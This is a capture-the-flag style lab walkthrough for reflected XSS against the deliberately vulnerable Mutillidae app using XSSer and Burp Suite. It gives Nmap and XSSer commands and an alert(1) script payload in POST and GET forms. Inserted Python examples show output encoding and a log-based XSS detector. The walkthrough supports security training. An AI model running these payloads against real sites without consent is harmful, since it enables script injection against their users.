
Walkthrough 1889

This document outlines 18 steps to complete an XSS attack on a vulnerable web application using the XSSer tool. The steps include identifying open ports on the target using Nmap, accessing the vulnerable pages in Firefox, intercepting requests with Burp Suite, using XSSer to generate payloads, and triggering the XSS vulnerabilities by passing the payloads to the target. References for Burp Suite, Mutillidae (the vulnerable web app), and XSSer are also provided.

Uploaded by

Ayoub Amellaln


Name XSS Attack with XSSer

URL https://attackdefense.com/challengedetails?cid=1889

Type Webapp Pentesting Basics

Important Note: This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic. Also, note that the IP addresses and domain names might be
different in your lab.

Step 1: Start the terminal and check the IP address of the machine.

Command: ip addr

The IP address of the attacker machine is 192.94.37.2; the target machine is located at IP address 192.94.37.3.

Step 2: Run an Nmap scan against the target IP.

Command: nmap -sS -sV 192.94.37.3

Ports 80 and 3306 are open.

Step 3: Access the web application using Firefox.

Command: firefox http://192.94.37.3

Step 4: Navigate to the XSS DNS lookup webpage.

URL: http://192.94.37.3/index.php?page=dns-lookup.php

Step 5: Enter any text in the “Hostname/IP” text field and click "Lookup DNS".

The entered value is reflected back on the web page.

Step 6: Check the usage of XSSer.

Command: xsser --help

Step 7: Configure Firefox to use the Burp Suite proxy.

Step 8: Start Burp Suite.

Step 9: Enter any text in the “Hostname/IP” text field and click "Lookup DNS". The request will be intercepted by Burp Suite.

Step 10: Pass the URL to XSSer. Replace “HelloWorld” with “XSS” so that XSSer substitutes the payload in place of the "XSS" string.

Command: xsser --url 'http://192.94.37.3/index.php?page=dns-lookup.php' -p 'target_host=XSS&dns-lookup-php-submit-button=Lookup+DNS'

The output confirms that the target is vulnerable.


Step 11: Try various XSS payloads using XSSer's “--auto” option.

Command: xsser --url 'http://192.94.37.3/index.php?page=dns-lookup.php' -p 'target_host=XSS&dns-lookup-php-submit-button=Lookup+DNS' --auto

Step 12: Use a custom XSS payload.

Command: xsser --url 'http://192.94.37.3/index.php?page=dns-lookup.php' -p 'target_host=XSS&dns-lookup-php-submit-button=Lookup+DNS' --Fp "<script>alert(1)</script>"

The encoded XSS payload is generated.

Step 13: In Burp Suite, replace the POST parameters with the final attack payload and forward the request.

The XSS payload will be triggered.
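
The fix for the behaviour shown in Steps 5 to 13, as an added example that is not part of the original walkthrough and is not Mutillidae's own PHP code: a Python sketch that renders the reflected `target_host` value the vulnerable way and the hardened way. The function names and the surrounding `<div>` markup are constructed for illustration.

```python
import html
import ipaddress
import re

# RFC 1123 style hostname: dot-separated labels of letters, digits and hyphens.
_LABEL = r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
_HOSTNAME = re.compile(rf"{_LABEL}(?:\.{_LABEL})*")


def is_valid_target(value: str) -> bool:
    """Allow-list check: accept only an IP literal or a syntactically valid hostname."""
    if len(value) > 253:
        return False
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return _HOSTNAME.fullmatch(value) is not None


def render_vulnerable(target_host: str) -> str:
    """The behaviour seen in Step 5: the value is copied into the HTML unchanged."""
    return f"<div>Results for {target_host}</div>"


def render_hardened(target_host: str) -> str:
    """Validate first, and HTML-encode whatever is echoed back, rejected input included."""
    safe = html.escape(target_host, quote=True)
    if not is_valid_target(target_host):
        return f"<div>Invalid hostname or IP: {safe}</div>"
    return f"<div>Results for {safe}</div>"


if __name__ == "__main__":
    # Constructed sample inputs: benign values and the payload string from Step 12.
    for value in ("192.94.37.3", "HelloWorld", "<script>alert(1)</script>"):
        print(render_vulnerable(value))
        print(render_hardened(value))
```

Validation alone is not the control: the error path also echoes the input, so the encoding step has to cover it as well.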


Step 14: Perform the XSS attack over a GET request. Navigate to the Poll Question webpage.

URL: http://192.94.37.3/index.php?page=user-poll.php

Step 15: Enter any value and submit the vote.

The value nmap is reflected on the web page.

Step 16: Copy the URL, replace the nmap value with "XSS", and pass it to XSSer.

URL: http://192.94.37.3/index.php?page=user-poll.php&csrf-token=&choice=nmap&initials=jd&user-poll-php-submit-button=Submit+Vote

Command: xsser --url "http://192.94.37.3/index.php?page=user-poll.php&csrf-token=&choice=XSS&initials=jd&user-poll-php-submit-button=Submit+Vote"

Step 17: Provide a basic XSS payload to XSSer.

Command: xsser --url "http://192.94.37.3/index.php?page=user-poll.php&csrf-token=&choice=XSS&initials=jd&user-poll-php-submit-button=Submit+Vote" --Fp "<script>alert(1)</script>"

Step 18: Open the final attack link in the Firefox browser to trigger the XSS vulnerability.

URL: http://192.94.37.3/index.php?page=user-poll.php&csrf-token=&choice=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&initials=jd&user-poll-php-submit-button=Submit+Vote
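
How the GET variant in Steps 14 to 18 looks from the defender's side, as an added example that is not part of the original walkthrough: a Python sketch that percent-decodes query parameters in web server access log lines and flags values carrying HTML or script markup. The log lines are constructed (timestamps and response sizes are made up; the query strings are the ones from Steps 16 and 18), and the pattern is a heuristic, not an exhaustive filter.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Markup that has no place in a poll choice or a hostname field (heuristic only).
SUSPICIOUS = re.compile(r"<\s*/?\s*[a-z][^>]*>|javascript:|\bon\w+\s*=", re.IGNORECASE)

# Request line inside a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def flag_reflected_xss(log_lines):
    """Return (path, parameter, decoded value) for each query parameter carrying markup."""
    findings = []
    for line in log_lines:
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        # parse_qsl percent-decodes names and values, so %3Cscript%3E becomes <script>.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if SUSPICIOUS.search(value):
                findings.append((url.path, name, value))
    return findings


# Constructed access log lines for the requests in Steps 16 and 18.
SAMPLE_LOG = [
    '192.94.37.2 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=user-poll.php'
    '&csrf-token=&choice=nmap&initials=jd&user-poll-php-submit-button=Submit+Vote'
    ' HTTP/1.1" 200 4321',
    '192.94.37.2 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?page=user-poll.php'
    '&csrf-token=&choice=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&initials=jd'
    '&user-poll-php-submit-button=Submit+Vote HTTP/1.1" 200 4377',
]

if __name__ == "__main__":
    for path, name, value in flag_reflected_xss(SAMPLE_LOG):
        print(f"{path}: parameter {name!r} carries markup: {value!r}")
```

Standard access logs record the request line but not the body, so the POST variant from Steps 9 to 13 is not visible this way and needs request-body inspection at a proxy or WAF.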

References

1. Burp Suite (https://portswigger.net/burp)
2. Mutillidae II (https://sourceforge.net/projects/mutillidae/)
3. XSSer Tool (https://github.com/epsylon/xsser)
